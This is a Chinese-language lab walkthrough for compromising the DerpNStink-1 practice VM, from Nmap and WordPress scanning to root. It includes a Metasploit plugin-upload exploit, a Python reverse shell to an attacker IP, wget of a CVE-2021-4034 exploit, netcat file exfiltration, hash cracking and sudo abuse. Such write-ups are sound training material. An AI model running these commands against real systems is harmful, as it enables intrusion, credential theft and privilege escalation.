DERPNSTINK-1 渗透测试实战教学文档

1. 环境准备与信息收集

1.1 环境配置

• 攻击机: Kali Linux
• 目标机: VMware虚拟机 (IP: 192.168.111.139)
• 网络扫描: 使用Nmap进行主机发现和端口扫描

# 扫描整个网段发现目标主机
nmap -sP 192.168.111.0/24

# 扫描目标主机全端口
nmap 192.168.111.139 -p- -sS -sV -A -T5

1.2 初始信息收集

• 通过curl进行POST请求获取第一个flag:

curl -X POST http://192.168.111.139/webnotes/info.txt

Flag1: 52E37291AEDF6A46D7D0BB8A6312F4F9F1AA4975C248C3F0E008CBA09D6E9166

• 发现DNS提示信息，更新本地hosts文件:

echo "192.168.111.139 derpnstink.local" >> /etc/hosts

2. Web应用渗透

2.1 目录枚举

使用dirb进行目录爆破:

dirb http://derpnstink.local/

发现WordPress后台: http://192.168.111.139/weblog/wp-admin/

2.2 WordPress渗透

• 弱口令登录: admin/admin
• WPScan扫描:

wpscan --url http://derpnstink.local/weblog

发现Slideshow Gallery插件存在漏洞

2.3 利用插件漏洞

使用Metasploit框架:

msfconsole
search Slideshow Gallery
use exploit/unix/webapp/wp_slideshowgallery_upload
set rhosts 192.168.111.139
set targeturi /weblog
set wp_user admin
set wp_password admin
run

2.4 获取稳定shell

# 攻击机监听
nc -vlp 6677

# 目标机反弹shell
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("攻击机IP",6677));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

# 升级为交互式shell
python -c 'import pty; pty.spawn("/bin/bash")'

3. 数据库信息收集

3.1 获取数据库凭据

grep "root" -rn /var/www/html/weblog/wp-config.php

获得数据库凭据: root/mysql

3.2 数据库枚举

mysql -u root -p
# 密码: mysql

show databases;
use wordpress_db;
show tables;
select * from wp_users;

发现用户unclestinky及其密码哈希:
$P$BW6NTkFvboVVCHU2R9qmNai1WfHSC41

3.3 密码破解

echo '$P$BW6NTkFvboVVCHU2R9qmNai1WfHSC41' > hash.txt
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt

破解结果: wedgie57

3.4 获取Flag2

使用unclestinky/wedgie57登录WordPress获取:
Flag2: a7d355b26bda6bf1196ccffead0b2cf2b81f0a9de5b4876b44407f1dc07e51e6

4. FTP服务渗透

4.1 FTP登录

使用浏览器或命令行访问:
ftp://192.168.111.139/
凭据: stinky/wedgie57

4.2 发现SSH私钥

在目录/files/ssh/ssh/ssh/ssh/ssh/ssh/ssh/下找到key.txt文件:

-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAwSaN1OE76mjt64fOpAbKnFyikjz4yV8qYUxki+MjiRPqtDo4
[...]
-----END RSA PRIVATE KEY-----

4.3 使用SSH私钥登录

chmod 400 key.txt
ssh -i key.txt stinky@192.168.111.139

Flag3: 07f62b021771d3cf67e2e1faf18769cc5e5c119ad7d4d1847a11e11d6d5a7ecb

5. 权限提升

5.1 方法一: CVE-2021-4034提权

1. 下载并编译exp:

wget http://攻击机IP:8082/exp.c -O cve-2021-4034-poc.c
gcc cve-2021-4034-poc.c -o exp
chmod +x exp
./exp

5.2 方法二: 流量分析提权

1. 分析/home/stinky/Documents/derpissues.pcap文件:

# 将文件传输到攻击机
nc -l -p 8888 > derp.pcap  # 攻击机
nc 攻击机IP 8888 < derpissues.pcap  # 目标机

# 使用Wireshark分析
wireshark derp.pcap

2. 过滤发现凭证:

log=mrderp&pwd=derpderpderpderpderpderpderp

3. 提权操作:

su mrderp
密码: derpderpderpderpderpderpderp

sudo -l  # 发现可以执行/home/mrderp/binaries/derpy*

# 创建恶意脚本
echo '#!/bin/bash' > derpy.sh
echo 'bash -i' >> derpy.sh
chmod +x derpy.sh

# 执行提权
sudo ./derpy.sh

5.3 获取Flag4

Flag4: 49dca65f362fee401292ed7ada96f96295eab1e589c52e4e66bf4aedda715fdd

6. 总结

本次渗透测试涉及的技术点:

1. 基础信息收集(Nmap, curl)
2. Web目录枚举(dirb)
3. WordPress漏洞利用(WPScan, Metasploit)
4. 数据库信息收集与密码破解(John the Ripper)
5. SSH私钥利用
6. 流量分析(Wireshark)
7. 本地提权(CVE-2021-4034, sudo配置不当)

所有技术仅用于合法授权测试和教育目的。